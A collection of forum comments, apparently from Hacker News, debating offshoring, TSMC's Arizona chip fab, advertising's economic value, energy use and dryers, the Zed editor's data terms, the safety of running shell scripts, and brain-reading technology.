It would be interesting to see how much of the economic advantage of off-shoring is due to lower wages due intrinsic to lower cost of living vs stuff like ignoring/bribing foreign officials or non-existent environmenta/safety standards that objectively should exist.
Personally I won't mind paying more to buy manufactured goods. My mom told me that a pair of sneakers before the offshoring back in the late 80s usually cost more than $300 in today's dollars. Yes, it was expensive, but I would just buy fewer and use the one for longer time. The reason is that in the long run the manufacturing cost would get lower due to increased efficiency, and loss of supply chain is detrimental to the entire country - and our living expenses will increase overall. Case in point, how much tax do we have to pay and how much inflation do we have to suffer in order to build those super expensive weapons? Part of the reasons that we had $20K toilet and $100 screws is that we simply don't have large enough supply chain to offset the cost of customized manufacturing.
Besides, the US loses know-how on manufacturing, eliminating potentially hundreds of thousands of high-paying engineering jobs - it will also be a pipe dream that we can keep the so-called high-end jobs by sitting in an office drawing boxes all day. Sooner or later, those who work with the actual manufacturing processes on the factor floor will out compete us and grab our the cushy "design" jobs.
you can feel free to buy american, i don’t care so i would prefer if it were not mandated and you get your individual choice to pay more for your goods if you want
Easy to get better value on wages when you get to pay under the minimum wage of your home country. And/or aren't required to offer benefits, vacation. And are able to work them twice as long without overtime pay. And don't need to care about child labor laws.
More so in the Chinese-speaking world and South Korea because the industrialization/urbanization is more recent, so there's rising demand in the urban areas with high population growth, resulting in high prices.
Japan's urbanization stopped long ago, and it's not taking in immigrants fast enough, so the urban areas have stopped growing.
The mentality refers to East Asia's deep agrarian root that places high value on owning land that can be passed down the generations (the alternative was often quasi-servile farm labour that locks families in poverty). Property purchases are usually multi-generational efforts, so families can generally take the brunt of overinflated prices.
2 is pretty infamous unless something big happened recently (a lot of big things in JP happened recently, so I could have legitmately missed something).
1 is 50/50. Urbanization is growing because the small town life is shrinking.it's wrong at face value, but there is a cost to this in the overall economy, since the country overall isn't growing.
It's just an obvious nonsense. Housing cost is dependent variable of local economic activities. People gather and property prices soar. Taiwan is jam packed so land prices would be higher relative to GDP per capita.
I think GP is finding concept of land scarcity non-intuitive for some reason.
> Real estate is always the monkey wrench in the gears of capitalism because of high necessity yet limited supply.
This only happens when the government becomes captured by land owners to constrain the supply, since otherwise you can build up. But governments getting captured by land owners happens a lot.
The chips still need to fly back to Taiwan to be packaged as packaging partner Amkor's facility in Arizona won't be ready until 2027*. I'm not sure the cause of the delta but it could be in part because Fab 21 got back on schedule rather impressively following earlier delays.
* updated to reflect newer article that Amkor's facility is delayed beyond late-2025
I was about to say, surly at some point in the near future the USA will introduce this capability. Shame they did not match each other in completion time.
Yeah definitely unfortunate. That said, I'm guessing the overall cost of overseas packaging is really tiny, otherwise Intel would've made a great customer since they are already packaging TSMC N6, N5, and N3 in New Mexico for their Arrow Lake CPUs.
This is not adversarial thinking. Ukraine would be delighted to hit one container with all Russia's advanced chips going to e.g. Vietnam or China to be packaged and sent back.
This is a massive supply chain weakness and presumably will be addressed as soon as possible.
Ticks do not require the consent of the host to drink blood.
Things like Google and Facebook cannot be parasitic, every dollar gained is a voluntary exchange with no threats. People choose to use Google and gain something from doing so.
Yep if the host agreed to die, then the market is a success. We've discovered the most efficient outcome – sucking the customer dry until they die! Thank you to the free market for delivering us this efficient result.
Remember kids – thousands dying from lack of healthcare isn't a bug of the system, it's a feature. This has been determined as necessary, nay even beneficial, by market forces that can never be wrong.
A business’s viability outside of advertising doesn’t change the morality of advertising.
Regardless of which side of the camp you fall on, you can’t argue that ads are “good” just because some businesses need them to survive. In fact, I’d wager if a business NEEDS ads to survive, it’s probably a net negative on society as a whole.
That's when you call any type of promotion advertising, in that case, sure, there is some innocent advertising. People here are (obviously) talking about 'modern' advertising which is what google/fb etc are doing which is just plain bad for everyone except for Google shareholders (I would imagine, besides money, it's not even good for the people working on it as it must do your head in to be a brilliant engineer and then working on tech so miserable and foul as that).
You think all businesses should just spread awareness by word of mouth? Can you put a sign on your store or is that an ad? What if you don't have a store? Yes, advertising can be really awful but that doesn't meaning all advertising is "cancer." If you have a good business that creates actual value for people, advertising it can actually be seen as a good thing.
It is clear we are talking about modern digital ads. Ads in magazines aren't as bad, but manipulating public opinion to sell the ads were/are. That's what Google/FB do at an absurd large scale right now.
> If you owned a small business you'd be singing a very different tune.
The problem with advertising is that a little bit done honestly is actually good and fine. What we actually have way, way too much, and it's often dishonest and manipulative.
It's a similar thing with finance. It's necessary, but way too many talented people are spending their energies on it.
Black and white thinking doesn't really capture the situation, and ends up creating a lot of noise (BAN IT ALL vs. IT'S ALL GOOD AND YOU LOVE IT, FIGHT!).
Honestly, I think it might be a good thing to put caps on the number of people that can work in sectors like that (and further limit the number of very smart people working in them), to direct talented people to more productive and socially beneficial parts of the economy.
Maybe 1 percent of Google's headcount is actually working on ad technology. There isn't some brain drain problem where people are doing ads instead of curing cancer.
Directly working. But then you have all the vehicles that, in the grand scheme of things, exist solely to enable ads and make data mining for them easier, such as Chrome and Android. Then there are products that exist primarily to lock you into the Google ecosystem so that you're forced to interact with the rest of it.
At the end of the day, if most of company's income is from ads, it can be safely assumed that whatever else it does is somehow about ads even if it doesn't contribute directly. Well, or else Google is incredibly inept.
Those "US STEM grads have their skills wasted" are solving those problems (optimal ad load, bad ads, etc.) but its a very hard problem. Don't be so dismissive.
There are "very hard problems" that don't need to be solved, or are far lower priority than other problems. Hard doesn't imply being "productive, useful and beneficial to society."
Setting aside the moral aspect which is highly subjective and seems to have a price tag (for example tech CEOs quit any sort of morals for a good paycheck), the productivity question is a measurable one.
Aka does advertising as a whole increase total consumption or is it a zero sum game (aka send bigger slice of the same pie to a competitor)
From what I know advertising does increase total demand aka more things/services need to be produced and sold on aggregate.
Some of the demand induced by ads is useful; people becoming aware of stuff they didn’t know exists, and finding that it provides a useful service for them.
But most ads are trying to convince you to buy their brand’s version of a product that you already know of, or (even worse!) a new version of an old product. Any demand induced there is just wastefulness.
If Amazon can figure out that I’m interested in headphones, I already know more actual information about headphones than their ads will give me.
I can’t relate to that. When I see a banner ad I find it obtrusive whether it’s from Bank of America or my favorite HAM radio company. If I’m in the market for a product I value hearing the testimonials of people in my life rather than an advertisement.
The one case where I find ads useful, when word of mouth isn't an option, is in a static image on a site (review site, blog, whatever) where I'm researching a thing. The ad would be related to that thing, doesn't need to know a thing about me other than I'm browsing that page, and is related to the content on that page. I click on those ads sometimes.
I’m trying to think of anything I find useful that I stumbled upon thanks to ads over the past twenty years or so, and I’m pretty much drawing a blank. It certainly seems negligible.
The problem with prohibiting ads is how to prevent (or even define) payed hidden promotions. But tracking and targeted ads could be prohibited, which would already make things much more civil and less relevant as a tech profit center.
>I’m trying to think of anything I find useful that I stumbled upon thanks to ads over the past twenty years or so, and I’m pretty much drawing a blank. It certainly seems negligible.
Maybe the ad is good when you arent even aware that you were influenced by it?
If you're "really interested" in something, you're already following new releases, doing extensive research for purchases etc, so why would you need ads?
Even worse, because advertising is a Red Queen's Race where the only limit on expense is what your competitors are spending, it's actually worse than unproductive because it increases company expenses without increasing product quality, leading to higher costs on everything for everyone.
You cannot be serious it. All of the ad tech companies produce a service people want otherwise no one would use them!
There may be other services that might be better if not for network effects, but it is trivially true that a search engine is better for most people than no search engine at all. And that is what is produced.
At least a few evil people attack once in a while thus proving some defense is needed so they they are not completely unproductive/useless. Much as I wish they were not needed.
It is though, more value is generated by the MIC than is put in and war has yet to ruin the productive capacity of the United States. The societal ills of this are why it’s popular to call America an evil empire
No actually, that's about the opportunity cost of war. There's a left-wing argument I frequently see that the US finds wars to increase profitability but I'm talking about the propping up of firms to keep the industrial capacity ready. It is not the most productive use of capital, but it is productive.
I don't either, and I don't want a war with either Russia or China nor do I want the slow escalation that is currently happening. But the political reality is that the US will not be decreasing defense spending any time soon. There's no voting this situation away.
I think about this quite often. What I'd really like to study at some point is: How much more does the receptionist at JP Morgan's head quarters make than the receptionist at Walmart's headquarters?
Because fundamentally I think there is an effect where the people in proximity to lots of money earn more. Obviously the Walmart receptionist and the JP Morgan receptionist are doing basically the same job. But the JP Morgan receptionist is surrounded by people who wouldn't think twice about doubling the receptionists pay and I would imagine that has a significant effect.
Experienced this(or actually, a similar phenomenon) myself during the brief, beautiful moment in my life when I was working in Switzerland and was making as much as the locals, while hailing from a country with approximately 20% the GDP per capita, if not less.
Crazy how the same box of pasta is suddenly three times the price once you cross the border.
It's not the proximity to money, it's the real estate tied to doing that job.
If you want to be the receptionist at Goldman Sachs at their headquarters at 200 West Street, New York, NY 10282, then you're looking at paying $616,250 for a 556 sq. ft. studio apartment. And that's just the housing. If you want to live within 30 minutes of work, you can get that number down to $400,000, but that's also a studio apartment.
Then you have to consider some place to eat - or you bring your own meals.
What about clothing? You need clothing that looks the part.
It's the proximity to real estate, which I guess you could argue is a proximity to "lots of money" as you put it, but... not reeeaaaally...
Sure, but real estate is expensive in those places for a reason - it being typically because a sufficient number of people with lots of money want to buy it.
There is only a weak correlation between local income and housing costs, and most of that is that it's hard to get extreme housing prices in areas with low income, rather than that housing in high income areas is inherently required to be expensive.
For example, Boston has a higher per-capita income than NYC but somewhat lower housing costs, and Austin has around the same per-capita income as Los Angeles but significantly lower housing costs. Because it's a lot easier to build housing in Texas than in California.
These companies hire all of these exemplary graduates and pay them so well because (1) they are flush with cash because businesses are essentially held hostage to adtech; and (2) so that they won't go out into the world and build systems that make them irrelevant, as smart people are wont to do from time to time. Someone on your payroll doesn't have the time nor the inclination to knock you from your pedestal.
Why else would Google need 182,000 employees? Or how about Facebook with 67,000? Microsoft clocks in at a whopping 228,000, and Apple at 161,000.
These are staggering numbers of employees. So many, in fact, that it would be an exercise in futility to try and manage so many for the number of products they offer, especially Google and Meta.
It's cheaper to make busywork than risk the cash cow.
Options traders are paid well. It's still unproductive.
You're just shifting around a bunch of numbers temporarily to make a bunch of money for someone and lose a bunch for someone else.
Lots of shit we do is well-paid and unproductive.
If, as a species, we eliminated all bullshit jobs, there's a good chance only 20-30% of the species would be working. Here in America, only around 50% of people are actually working. Everyone else is in school, or retired.
You are downvoted because what you say is unpopular, but nobody tried to refute what you say.
Despite what some people may think, options are not just for gambling, but some people - like farmers who have to plan for uncertain weather - use them for a real purpose. And of course the use of option in the financial sector for hedging is extremely important too. But it's easier to dismissively say that trading options is a "bullshit job" and go back to one's ivory tower.
For a new factory with a new entry into the local market it makes perfect sense to bring in experienced workers for knowledge transfer. This is more an issue if a decade later this is still how things are done.
Back when American companies were offshoring, the initial start up teams were comprised of a lot of Americans who would do commissioning and initial ramp ups while training up the foreign workers. It's a lot easier to train people on a production line that is proven to work.
Problem is, those jobs in emerging markets were desirable compared to other jobs (for pay and opportunities), which helped with talent growth. These factory jobs, in comparison to other jobs, aren’t that desirable.
Fairly bad locations, average pay. It's not like the newer Japanese towns chip towns where you can get on a train and be in a proper city (ex. 40 min ride from Chitose to Sapporo), with okay pay as well. If pay was really good, it wouldn't matter, but selling this dream to a university grad is a bit hard in the US. I still hope it pans out though, cause NA manufacturing revival would be great. It's just the odds are against it so far.
Edit: This is not news. This (combined with their higher EE education) is why Taiwan won IBM PC-clone-related manufacturing in the 80s. And why they now have TSMC.
Such a great victory for American industry... the future is to bring workers from Taiwan with skills and willingness to receive a fraction of US salaries.
Say TSMC pays supper competitive US salaries to attract US-only labor, higher labor cost which is causing the end product to be more expensive, which makes that fab uncompetitive globally causing Apple to go buying from someone else and TSMC either choosing leaving the US or going bust eating the losses.
You can't compete with lower-wage countries in a globalized world with no trade barriers and no tariffs, when Apple wants higher profits and consumers want lower prices. Something has to give.
You can put tariffs on imported chips to equalize the field, but then iPhones would be more expensive for the average American and Apple's stock would tank.
More automation. Given the chemicals involved in fab work in general I expect this fab is very automated just for safety reasons and so very few employees are needed. Thus the cost of labor isn't a significant factor.
>Thus the cost of labor isn't a significant factor.
It is. Semi fabs aren't fire-and-forget. You need highly skilled people to constantly check and tweak all the operations in a feedback loop 24/7 and every hour of downtime due to any issue means millions lost. You hire the right people to minimize that downtime while also keeping the costs in check. It's a delicate balance.
The problem was never the cost of labor. US tech is already highly profitable and they can pay the full salary if they wish to. But their desire is basically to get a free card to pay lower salaries by any means, so they can send more of those profits to shareholders. The US is essentially a fighting arena between shareholders and workers. The profit is there, it is just a matter of how business want to keep always more of the spoils to themselves.
Why would well educated US grads go work in a semi fab for 50k when they can make 5-10x in an office or at home, getting people to click on ads in the bay area, or move money around between tax heavens in new york?
Your answer explains why the US is creating a failed society. It either implodes or needs to control other countries to maintain its profit and consumption levels.
This solves for the US national security issue; in the event of war between China and Taiwan (and a possible proxy war with US), Taiwan immigration would qualify for asylum.
This is not arrogance. This is not even about China and Taiwan fighting a war. (Heck, that's probably never gonna happen anyway.)
This is about the US manufacturing important things on our own. And it's not just the US either by the way. The Europeans want to be able to manufacture their own chips. The Russians. The Chinese. The Japanese. The Koreans. And on and on and on.
Why? Because the current system is dumb for everyone who is not Taiwan. For a whole lot of reasons. (Most of them economic.) No one wants to say that out loud, but it's the truth. We can't have everyone dependent on chips but only one nation capable of making them. Again, we're not the only ones who have come to this conclusion. Are the Chinese also "arrogant"? Are the Japanese "arrogant"? The Europeans? The Russians? Are the Koreans "arrogant"?
So everyone else can make common sense moves, but it's "arrogant" if the US does the same common sense thing? So we should just keep paying out an increasing share of our GDP as chips become more and more important and expensive while everyone else makes moves to cut their costs right? Is that what we have to do to be considered not "arrogant"?
You can't really be this obtuse. Asylum of high-skilled silicon workers from an ally under invasion isn't nearly the same thing as the asylum being granted over the last 4 years to anyone who could download the CBP One app.
> the asylum being granted over the last 4 years to anyone who could download the CBP One app
This is entirely unmoored from reality. CBP One only allows people from Cuba, Haiti, Nicaragua, and Venezuela to make appointments, and once they have one, they have to actually show up and argue their case (why they need to come to the US for their own safety). You can’t just show a border patrol officer that you have CBP One and walk on through.
How much does salary contribute to the overall cost of operating TSMC? Perplexity said that the average salary of a TSMC employee is $76K a year, and TSMC had about 80K people. So it cost them around $6B a year on salary. In the meantime, their operational cost was about $46B a year, so that's 13%. TSMC shipped about 16 million 12-in wafers. Each 12-inch wafer can make about 300 to 400 chips. Let's say 200 to stay on the conservative side. That will be 3.2B chips a year. That means the cost per chip on salary will be less than $2 a year. It looks HC cost is not that dominant?
Making chips isn't something you learn the details of at University. You can take all the classes you want in advanced semiconductor techniques but the simple fact is University level manufacturing is nowhere close to SOTA.
Basically, you need fab workers to spend time in Taiwan/China, and then return to USA. It's the same model that most foreign students use at schools in USA/Canada. Get USA/Canadian name brand school on resume, learn english, and go back to home country = profit.
Re the first point: Why do you think it is so difficult to transfer chip production off Taiwan?
I don’t think this is about salaries. Nor is this about facilities.
This is about process know-how. And it’s currently not available outside of Taiwan. I’m glad we’re finally starting to transfer knowledge. It will take a couple more years.
Does anyone know the general path to get involved in this? Perhaps its romantic, but this seems important, it seems hard, and it seems like something I can be proud of working on (as opposed to maximizing ad clicks). I'm just a SWE w/ a Comp sci degree, so what's the entry-point here?
Your entry point is a masters and probably Phd in Electrical Engineering, specializing in some aspect of semiconductor manufacturing. It’s definitely not CS.
Surely there is a lot of software involved in the design / operation of these fabs, it's not just designing the chip directly. Another commenter mentioned EDA so maybe I'll look into that.
There is a huge amount of software in every single step of making an ASIC, digital or analog. Or even a PCB for that matter. Long gone are the days of cutting tape and etching anything yourself. Apple's M3 has 25 billion transistors. No human drew those.
I'm not too sure but I would assume there's going to be faster turn prototype chips in the USA now? Is packaging needed to prove a prototype? Can we start buying IP blocks and make our own ICs? I'd love a MCU with built in IMU and wide range LDO, not sure if that's possible all on the same node.
There's going to be some niches opening as a result of this IMO.
It might be possible but domain knowledge might give some candidates a leg up on the competition, going in blind just seems suboptimal, though most of the relevant EE undergraduate classes were in sophomore and junior level for me in the late 1980's and I only got to use EDA software when working a couple of semesters for AMD as a junior.
it's first step. you gotta do something to bootstrap, solve chicken-egg problem. From what I can see around me, the "made in america" is a no joke branding. a lot of pppl going tobuyjust because of that. and may even consider it as social status and their policial support.
Another $100. That's a little over six years old now though, so bump it up to $200.
Would I pay $1399 for an American made iPhone with American made internals, as the article suggests it would cost ($100, but I doubled it for inflation, because, why not?)? You bet your sweet ass I would.
I have two kids in grade school and middle school and I see why we have a STEM gap. I have to constantly correct the learning at home in math. Also, I think it's fair to assume that in Korea, Japan, Taiwan, and China the school kids are actually put on an academic grindset unlike here where there is such little academic rigor or discipline being enforced by the school it makes sense why the k-12 education numbers are as bad as they are in the USA.
It might be worth getting up in front of the kids in middle school + and saying "Hey you're in competition at a global scale here. You're going to have to work your butts off to stay relevant."
Sure, but this is how a supply chain gets bootstrapped. All those factories in China didn't magically appear one day. Just like they didn't appear when Apple started moving operations to Vietnam. You start piecemeal and build out.
Maybe that's how US is going to have enough STEM talents -- just like WWI and WWII, take as many talents as possible when the other parts of the world are in shit.
The scenario that we’re going to be able to fight a war with another first world power, where we will attack their infrastructure but ours will be left untouched, seems unlikely.
We just need to make sure that we never fight directly with another regional power, e.g. China or Russia. IMO, neither of them wants a fight with the US too, because you don't want to push a super power to the corner, EVEN if you think you are good enough to win.
In the mean time, the situation in EU and Asia is going to deteriorate and North America can absorb more talents as it sees fit. The last two times it was mostly EU but this time Asia might be the new talent pool we can draw from.
It seems likely enough if the situation escalates. The conflict could be anything from a naval skirmish where neither side attacks the other's mainland to a total war scenario. It will likely start as naval-only and become gradually more involved if no side backs down.
However, it's safe to assume cyber attacks will hit Arizona. It's not unreasonable to assume crazy people will attack critical infrastructure, and we'll have to deal with the social fallout from that.
I have no specific info regarding this plant, but for anyone who never experienced this: flying in people from other plants at the starts (and all 3rd party vendors for a hypercare phase at launch) seems pretty normal.
If they have to keep staffing it that way, that's different.
you can fly a few hundred million dollars worth of chips in a single flight. You need not be concerned. The impact from temu shipments is several orders of magnitude higher.
made in america is also a federally defined standard that these chips categorically fail to meet. assembled in the united states is more appropriate, and even then if you didnt hire americans to do it, what was the point?
this is starting to feel like the best of intentions that has spiraled into a political theatricality where close-enough will be good-enough.
given the current state of declining US college enrollment, the affordability crisis of college, the growing wage gap, the failure of the minimum wage to keep up with the cost of living, and the failure to reform predatory US student lending practices I do not see how the US will in the next 25 years ever manage to curate the type of braintrust for which it was once renowned across the globe.
This is so disconnected from reality. They've gone from breaking ground to replicating one of the most advanced fabrication processes in the history of the world _at scale_ in about 4 years, but they'll be sending the dies off for packaging while their packaging partner comes online so its just political theatre?
Also, over half of the employees are local hires and the ratio will increase as more of the fab spins up. IMO it would be much worse political theatre to delay and balloon the cost of the project by forcing TSMC to exclusively use a workforce that has no experience with the companies tools and processes.
How about we continue using something more convenient like a standalone dryer and focus our energy usage reduction on the largest target -- which is manufacturing by a whopping 76% of the total electricity consumption in the United States (https://www.eia.gov/energyexplained/use-of-energy/industry.p...) as well as transportation. Nothing else comes close.
Residential energy use (excluding transportation) is a bit over 20% of total US energy use [1]. Industrial use is about 32%.
Of the transportation sector, about 25% is "cars and motorcycles" and 32% is light trucks; however, a lot of that light truck usage includes pickup trucks for private use. [2]
I can't prove it without more Googling but when you put the two of those together energy use of the direct control of consumers likely exceeds that in the industrial sector.
So while this is small beer, switching out your gas heating and hot water for electric heat pumps, insulating your house better, and switching to EVs are a big deal in terms of reducing greenhouse gas emissions, not to mention the almost forgotten but huge benefits of reducing local and especially indoor air pollution.
Why fight an uphill battle for reduction in manufacturing when you can get rich by being the first to offer cost competitive on-site carbon free power production? Forget marketing rooftop solar to households, you should be selling micro-nuclear to steel and cement plants.
A lot of American steel mills have houses literally right next door to them, in part because many of them were built before the widespread availability of cars.
There's no way in the world you're putting a nuclear plant on site.
Why not? Nuclear is far safer than a coal or gas plant and that's using the older model reactors as a stats source. Newer small reactor designs are even safer. Anxiety and fear of nuclear power is a purely media and activist driven phenomenon not supported by any evidence. The chances of you dying as a result of radiation released from a nuclear power plant are incredibly small even if you were to live right next door to one your entire life. You're much more likely to die in a car accident and yet you'll use those every day without a second thought.
As a society, it makes more sense to figure out how to generate more clean energy (rather than to try to reduce our energy usage).
But as an individual who wants to do something, and in principle has an incentive to reduce their energy bill, reducing consumption is the main thing under their control.
Perhaps it feels that turning down the thermostat or skipping the dryer helps, but the vast majority of your energy use is baked in by the manufacturing and transport of everything you use and eat.
If you live far from the temperate zones, just keeping yourself alive costs a ton of energy.
The best thing you can do is making nuclear and solar an issue with your local politics and then voting for it.
I would say the best thing you can do is "making nuclear and solar an issue with your local politics and then voting for it" and then also trying to reduce your energy consumption
"Quirky" Japanese technology? Buddy, it's a dehumidifier. That thing you can buy at any big-box store in the US? Except they put it out of the way in the ceiling of the room that is the most humid. In Europe there are "drying cabinets" that are the same idea. Some only have fans/heaters, others have dehumidifiers.
I exclusively dry my clothes on a ~$30 folding clothes frame that will take a full washer load. If I'm in a rush, I point a fan at it.
In the winter, the humidity is welcome and the fan alone dries the clothing really quick. In the summer, I set it up outside. If there's a good breeze, my laundry is dry in no time. If I set it up indoors, the central AC takes care of the humidity.
My electric bill is tiny and my clothes last forever because they're not getting beat to shit for half an hour every week...
They are almost exclusively metal and in the more expensive (e.g. https://www.lidl.de/p/leifheit-standtrockner-pegasus-180-sol...) models some plastics. They are 3-4cm thick when folded together and big enough to hang an entire load from a regular sized washing machine.
Are dryers really more convenient? Maybe I'm just lucky to live someplace dry, but I find skipping the dryer is the less-work route. It's a whole separate phase to deal with. I only use mine now if I'm in a hurry for something to be dry, which is pretty much never.
Eh, it's still a second phase. If you have enough empty space in our closet for air to circulate around each item, you can just hang them straight from the washer into your closet. They're dry by the next morning.
Before anyone jumps on a new text editor band wagon, just a note on the
license they have you agree to in using it:
"Customer Data consisting of User content created while using the Solution is classified as "User Content". User Content is transmitted from Your environment only if You collaborate with other Zed users by electing to share a project in the Editor.
[...]Zed's access to such User Content is limited to debugging and making improvements to the Solution."
No commentary from me. Come to your own conclusions.
I would like some commentary from you, sounds very reasonable to me, I don't understand what the problem is.
Of course if you choose to share your project with others for collaboration, the content of that project is transmitted from your machine, what else would you expect? How would it work otherwise?
I misread the above comment it seems, however, my point was that for many it is not instant no, since so many buy space from GitHub et al. Probably most of the small companies.
They have already trust in place. Do they trust Zed too?
The thing is every time you load company proprietary code and/or sensitive data you better make sure you don’t hit the share button as well.
Not the end of the world but also something we didn’t have to think about until recently. That pushing a button (other than delete) could potentially get you fired.
This question of who gets to see your company data is I think a lot more thorny these days than ever before.
You're joking about email, but that's of course the reason why companies will pay a lot to host email on premise instead of relying on cheaper offsite solutions. I think Exchange Server is Microsoft's biggest foot in the door to access conpanies tbat otherwise wouldn't care much about the other Microsoft services.
Having a third party look at every email you're sending around is just a non starter for many businesses.
Getting the same setting in an editor where your code is shared with the editor company everytime you want to show it to a colleague is not trivial at all.
You can examine the contents of the shell script yourself -- but how is this any different from running the rest of the application without examining the source?
Do you just draw some arbitrary line to say, "running easily readable shell scripts is bad, but compiling and running code I have never looked at or completely understand is okay."?
Really the only logical answer here is to adopt a zero trust security model and just assume every line of code is compromised. Run it in a VM, in a container, firewall it, jail it, sandbox it, etc.
Otherwise you're whispering sweet nothings to yourself if you believe piping unknown scripts to shell is the most vulnerable thing you can do here.
Why not? There are perfectly legitimate uses for this kind of technology. This would be a godsend for those suffering from paralysis and nervous system disorders, allowing them to communicate with their loved ones.
Yes, the CIA, DARPA, et. al. will be all over this (surprisingly if not already), but this is a sacrifice worth making for this kind of technology.
How many people in the whole world are paralyzed or locked in? Ten thousand? Less?
How many people in the whole world are tinpot authoritarian despots just looking for an excuse who would just love to be able to look inside your mind?
Somehow, I imagine the first number is dramatically dwarfed by the second number.
This is a technology that, once it is invented, will find more and more and more and more uses.
We need to make sure you don't spill corporate secrets, so we will be mandating that all workers wear this while in the office.
Oh no, we've just had a leak, we're gonna have to ask that if you want to work here you must wear this brain buddy home! For the good of the company.
And so on.
I'm blind, but if you offered to cure my blindness with the side effect that nobody could ever hide under the cover of darkness ( I donno, electronic eyes of some kind? Go with the metaphor!) I would still not take it.
The other thing you people are missing is how technology compounds. You don't need to have people come in to the police station to have their thoughts reviewed when everyone is assigned an LLM at birth to watch over their thoughts in loving grace and maybe play a sound when they have the wrong one.
All this choice guarantees is new technology will always be used for bad things first. It holds no sway on whether someone will do something bad with technology, after all it's not just "good people" capable of advancing it. See the atomic bomb vs the atomic power plant.
What's important is how we prepare for and handle inevitable change. Hoping no negative change comes about if we just stay the same is a far worse game.